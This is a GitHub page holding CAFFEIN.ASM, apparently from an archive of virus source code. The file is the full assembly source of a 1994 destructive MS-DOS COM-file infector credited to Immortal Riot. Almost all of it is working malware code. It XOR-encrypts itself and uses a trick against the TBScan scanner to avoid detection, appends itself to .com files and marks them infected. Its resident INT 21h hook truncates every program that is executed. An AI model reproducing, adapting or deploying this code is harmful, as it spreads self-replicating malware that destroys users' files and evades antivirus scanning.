forked from guitmz/virii
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCAFFEIN.ASM
executable file
·213 lines (158 loc) · 6.21 KB
/
CAFFEIN.ASM
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
; ------------------------------------------------------------------------------
;
; - Caffein -
; Created by Immortal Riot's destructive development team
; (c) 1994 The Unforgiven/Immortal Riot
;
; ------------------------------------------------------------------------------
; þ Undetectable/Destructive COM-infector þ
; ------------------------------------------------------------------------------
.model tiny
.code
org 100h
v_start:
firstgenbuffer db 0e9h,00h,00h
virus_start:
mov bp,0000h ; get delta offset
call trick_tbscan ;
call decrypt ; decrypt virus
jmp short real_start ; and continue..
trick_tbscan:
mov ax,0305h ; set keyb i/o
xor bx,bx ; too beat the
int 16h ; shit outta tbscan
ret
write_virus:
call encrypt ; write in encrypted mode
lea dx,[bp+virus_start] ; from start to virus end
mov cx,virus_end-virus_start ; bytes to write
mov ah,40h ; 40hex!
int 21h
call decrypt ; decrypt virus again
ret
crypt_value dw 0
decrypt:
encrypt:
mov dx,word ptr [bp+crypt_value] ; simple xor-encryption
lea si,[bp+real_start] ; routine included to
mov cx,(virus_end-virus_start+1)/2 ; avoid detection by scanners.
xor_word:
xor word ptr [si],dx ; encrypt all of the code!
inc si
inc si
loop xor_word
ret
real_start:
mov di,100h ; transer the first three
lea si,[bp+orgbuf] ; bytes into a buffer
movsw
movsb
lea dx,[bp+new_dta] ; set's the dta...
mov ah,1ah
int 21h
mov ah,4eh ; find first file
commm: lea dx,[bp+com_files]
next: int 21h
jnc foundfile
jmp chk_cond
foundfile:
mov ax,word ptr [bp+new_dta+16h] ; ask file-time
and al,00011111b
cmp al,00000010b ; compare second-value
jne infect ; not equal - infect!
mov ah,4fh ; otherwise, search
jmp short commm ; next file in directory
infect:
lea dx,[bp+new_dta+1eh] ; clear file-attribute
xor cx,cx
mov ax,4301h
int 21h
mov ax,3d02h ; open file
int 21h ; in read/write mode
xchg ax,bx ; file handle in bx
mov ah,3fh ; read 3 bytes
mov cx,3 ; from orgbuf
lea dx,[bp+orgbuf]
int 21h
mov ax,4202h ; move file-pointer
xor cx,cx ; to end of file
cwd
int 21h
cmp ax,666d ; check if file is
jb too_small ; too small
cmp ax,64000d ; or too big
ja too_big ; to infect
sub ax,3
mov word ptr [bp+virus_start+1],ax ; create a new jump
mov word ptr [bp+newbuf+1],ax
mov ah,2ch ; get random
int 21h ; value to use
mov word ptr [bp+crypt_value],dx ; as the xor
call write_virus ; value
mov ax,4200h ; move file-pointer
xor cx,cx ; to tof of file
cwd
int 21h
mov ah,40h ; write the new jump
lea dx,[bp+newbuf] ;
mov cx,3
int 21h
too_small:
too_big:
mov dx,word ptr [bp+new_dta+18h] ; restore file's date
mov cx,word ptr [bp+new_dta+16h] ; and time and
and cl,11100000b ; mark the file
or cl,00000010b ; as infected
mov ax,5701h
int 21h
mov ah,3eh ; close file
int 21h
lea dx,[bp+new_dta+1eh] ; and put back
xor ch,ch ; the file-attributes
mov cl,byte ptr [bp+new_dta+15h]
mov ax,4301h
int 21h
nextfile:
mov ah,4fh ; seek next file
jmp next
chk_cond:
mov ah,2ch ; check if we should
int 21h ; make the pay-load
cmp dl,4d ; activate
jb resident
jmp short reset_dta
newint21h proc far ; this code is memory resident
cmp ax,4b00h ; check for execute
je create ; matched
jmp cs:oldint21h ; naaw
create:
mov ah,3ch ; truncate the file executed
int 21h ; and give it full-attribute
int 20h ; and just exit to dos
newint21h endp
in_mem:
resident:
mov ax,3521h ; get original vector from
int 21h ; es:bx to int21h
mov word ptr cs:oldint21h,bx
mov word ptr cs:oldint21h+2,es
mov ax,2521h ; set a new interrupt vector
lea dx,[bp+offset newint21h] ; for int21h to ds:dx
int 21h
lea dx,[bp+offset in_mem] ; and load it resident
int 27h
int 20h ; and exit
reset_dta:
mov dx,80h ; puts back the dta to normal
mov ah,1ah
int 21h
mov ax,100h
jmp ax
signature db "[Caffeine] (c) 1994 The Unforgiven/Immortal Riot"
com_files db '*.com',0
orgbuf db 0cdh,20h,90h ; buffer to save first 3 bytes
newbuf db 0e9h,00h,00h ; buffer to calculate new entry
oldint21h dd 0
virus_end:
new_dta:
end v_start